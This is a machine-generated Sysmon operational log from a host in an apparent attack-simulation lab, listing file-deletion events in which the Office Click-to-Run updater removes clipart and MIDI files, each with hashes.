14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00246_.WMFMD5=EDE49E938059AA3869AB759D01522A1D,SHA256=6739EFCD4A9EBBA8645155D24A8E906F7E9B30A4E27A37C0B61B946AE3F5F21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00241_.WMFMD5=0EA8B9F64154125EFD4712467A567805,SHA256=9AA5E9721271D336427FA725B1654ADA344845C94D7773D089A36E1F5C44D9EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00234_.WMFMD5=77AB61AFE2E5D3AA46F41587C3A53545,SHA256=6208700253C9BE0A3027D861EAD43B2C62CCB712E408261E4633F80B9211454E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00231_.WMFMD5=D696F62510DC666A891049154A5D678A,SHA256=1FACB62DD4A56651A16710E922B99D54D4480DF269AE2C78F8BFB0F1A0B06E6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00218_.WMFMD5=B44AE8D95FFE29207C415584F398EFD6,SHA256=92C54D03974554871608048B979029517F8130ACB56FD74693C18BEF88EF04EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00217_.WMFMD5=81802520A9BBCC978503997DF05C0E4D,SHA256=65019430B91FED6115FF6AAE7DAB83C123132243F47AE3EE2026DD0FB5C187DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00211_.WMFMD5=FA8E4D6C6FCDA3E0AFB8329EC58C6100,SHA256=27A11CD7B3D67435D86920E046D67F48D7554A027D903CA6FD9A91CCE21D1B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00095_.WMFMD5=34065BAA03BC70A48E77045B2434433A,SHA256=77A1920E88AD0081B50A450A194D0570E750977528D4F9B2C50994E510760FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00018_.WMFMD5=799520051559F6BF206E34C1F300AEA9,SHA256=75BA9D078ACE58A4BF34AD297C687BEB9368D02FAD2532BE00667EB058358802,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00014_.WMFMD5=D717BA7CB60C0812F4F3C142885E4406,SHA256=F8BCBABB10ADEC58C32E8BDDD6A2967938AD59C5BC17B7A6177E1AFFD010B4B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TN00011_.WMFMD5=2FDF7344FFD00F98409EFD44CC152213,SHA256=20DBF8FE231DE6EA4A6B221ADCFECE2A26E23EC69762BD2100506398284451C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\TAIL.WMFMD5=56B1DE000BBD854F391FF1FA6DE2D8CD,SHA256=4A004E930D6C96E73880DBCE7356004B8D4E9B0665AF4A991EF495E6AE547C7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01590_.WMFMD5=070552541A61AACE68FBFE3C5BD4F040,SHA256=40A1510D6AB08894931B7B14CA824C870F6194CA7A11A53D27F661FFB411599E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01572_.WMFMD5=66C1AB6A635F9731C8E2610A2890FFE7,SHA256=D92695574E1ADAEE1FF59A0298D11BCC1EC26C7670110FD9EF3B1A86D7E43CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01563_.WMFMD5=6EE2E5FBBB70805447ABBF5E733E7917,SHA256=CD70EF8057B214280A9AC0F0AA0740FEBCE28492834A7F0068C27F565FC0F636,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01491_.WMFMD5=32A999BA9AE148E82D97006E8D411FFB,SHA256=FB79C44A462A8239EF9AA421213A97BD9AB08AE5E674BBF387A52714520FEC4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01462_.WMFMD5=26E2123FBBF9F39C5817221057C185A8,SHA256=8FC4C08855D8A7B061C99E738DE84B03A2B8AA3E1F81D12CE3AEC0FF0C841A69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01253_.WMFMD5=265533856A67068C7F1CA9CABA78E6D1,SHA256=77B3016D97A61B0EBF2DC4E0E12D91C53B85E413B43D373082A3083B07F263CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01252_.WMFMD5=70E3F5622B8CC63EF5AE5023FC993CD5,SHA256=79032163F8FC229204CF6894C52E4E24BE8596DDE77AC6DC22A3DE65D1E6B41F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY01006_.WMFMD5=2442BE87C8E949C636D45BB2F03940FD,SHA256=D54BE227B23C7DB4EBFA34BDEA3AC7EBEAE1D821C45B5D28FB6623068C221B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00882_.WMFMD5=C0DE753CA0A00410284D742184A4CD85,SHA256=B73AE4AC25EDF8522E6ED536882081D58BAFBFBED1CD4E703955AB0598654274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00795_.WMFMD5=91554826FAC9CDD841935172AC7C84A2,SHA256=00EA7DCF923E0C1E0C732D1D98A6F9999E520BABC6CE92DDB6E8873348364BD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00792_.WMFMD5=9DF602D53D91AD3D6B85ECBB17549758,SHA256=25EFC095085E56BFEDE6406CF8DF2B94D709A3D142230D72D312BF71C1654271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00788_.WMFMD5=0F3FC1D8AD7C7F80BC6DBB0DB021FD2A,SHA256=4978A9030A536C1F5CA5C26FC983D0B2CB1FD08FB4A27D6364A64BFD203FF082,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00642_.WMFMD5=34AED888E9D4B4162A79E28CBF76CEF4,SHA256=00FCAE8289C39E64022358090E272CE09DF4D0A3FCC12668BD00E619B8158802,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00560_.WMFMD5=4671E32CEFC6A6E465EC0232059B60E9,SHA256=9C80435B1B5ED3EF441F5456FC16D3696628DF545AEDD0B06686CED8BA47FBFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00170_.WMFMD5=024DCBA0A60E56C0DFFDD06F0591B883,SHA256=25C332F625523CA94C0B1F6D8D708F7C38A060BD5A68CD4EEECD2A20BB8099BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00132_.WMFMD5=E369BC42299F666E4DA60E83DF68C1AF,SHA256=8FB058A60F4E20C5FE648E10B3D4A882469D5AB1F57759D3F1F5A97F87A29675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00127_.WMFMD5=A2499E2AAA68941477CE53F25E18EB8D,SHA256=8AFD2C69CBBFCA0EE2A0161E3FE178DADF94E8795720935472E69E3539EC53E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SY00110_.WMFMD5=8FC1933410D6268FBD5AC8D22667D940,SHA256=9105ED11855191EAB5A05CAFD16B993268D51FE9832D78BBE082B24794EDB133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SWEST_01.MIDMD5=6A1FA4FB024AFB1B20E4AE0D33A08C59,SHA256=96BEE42D16487F7F7D68B7B562264ED2C87A0C2510D0EDC9069A2A7EC2B70E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SUMER_01.MIDMD5=39CF8960AB29D56660276C18EAFA1725,SHA256=57EFAA2A8C63D058BF4D0336B20A3E531D860604FCC05AD9A885D2B7907DD26B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\STUBBY2.WMFMD5=A08BFCFF3F293B1E7F9B0D2D0DA1A829,SHA256=274B4B0559F3C52F952B45EDDE6F99B775391892C2AEFBFCD4197363531C1F0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\STUBBY1.WMFMD5=DFE8ADF20F0377394BF11CE08ECDC0F6,SHA256=6CF4DF6136D517F3CF4F10F42167A06C15FA4B34C7246B45DCCC16BCAD7D8F11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SPRNG_01.MIDMD5=79ACEB3CC571650B1FEB432323B2341A,SHA256=A22F9267B3B119296F1FB9D6F571A31430AE9661FD18724739F3FDA88DD2B7A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SPACE_01.MIDMD5=D816A1D9CF181DDDD82561EA0B906F11,SHA256=0AB9371CAD4EA349A72DBA84D426053A3ABEABB2808CADBE290C03423C454B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02958_.WMFMD5=3197814F7950E2FC3BB4A6337A064A3A,SHA256=F0015EAC3A7FFBDC47B2746EBC79EFB4072DB9F900648D82488C7B7300D7E78F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02886_.WMFMD5=FE8200C0921ED8BE82A0090689D21ED3,SHA256=F828ACA2AD58FDFF70ACB59BA243906705C2EAC31DAAAC4F88F63BC6E7E1F08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02862_.WMFMD5=3939DFD69A6D7DDCCE6804C1C02B259A,SHA256=5BC46E10BDF0E9C16F1D17D4F81B6E7A59946D794A8CA0BC3BC37CFB0241506F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02794_.WMFMD5=4630F41114E555368B068651DA9BD47D,SHA256=B432B072DE49142C2F1B822FF8E7A9E9D10380837C1F875E2464FB35A36FD8AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02793_.WMFMD5=3F40E686A997524D54A87874E3C5DE4E,SHA256=9048DE11BBDE88E5A3B25B14CC3FD5E139009E81CE8F9153D424E92892F4B1EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02791_.WMFMD5=046BFBE71F1680D4112F396EEF45F231,SHA256=6E185D4BBA43B5AA983DDE489BA88A596DF198F72BAF3FE9005C604B0230D010,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02790_.WMFMD5=2CC154CA91F2A64D262BD6D55504C93A,SHA256=D551981485288776AA4523E86FB3DE3C35794C57D5711A8F6D8EAECFF9FFFFF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02617_.WMFMD5=81921BD8E40ADC628E6761019A285B60,SHA256=8DDE3570E3EA4A375E4E87A9F17E7D8C55C5A8AFB20E0A4D3F0269464BFB0286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO02578_.WMFMD5=A7E63BFFD91D8F6B28B804172C98A97F,SHA256=007EA7DB70BB53D84356877F7837E430BE082C03A25BD07AEE77475C920535DD,IMPHASH=00000000000000000000000000000000falsetrue 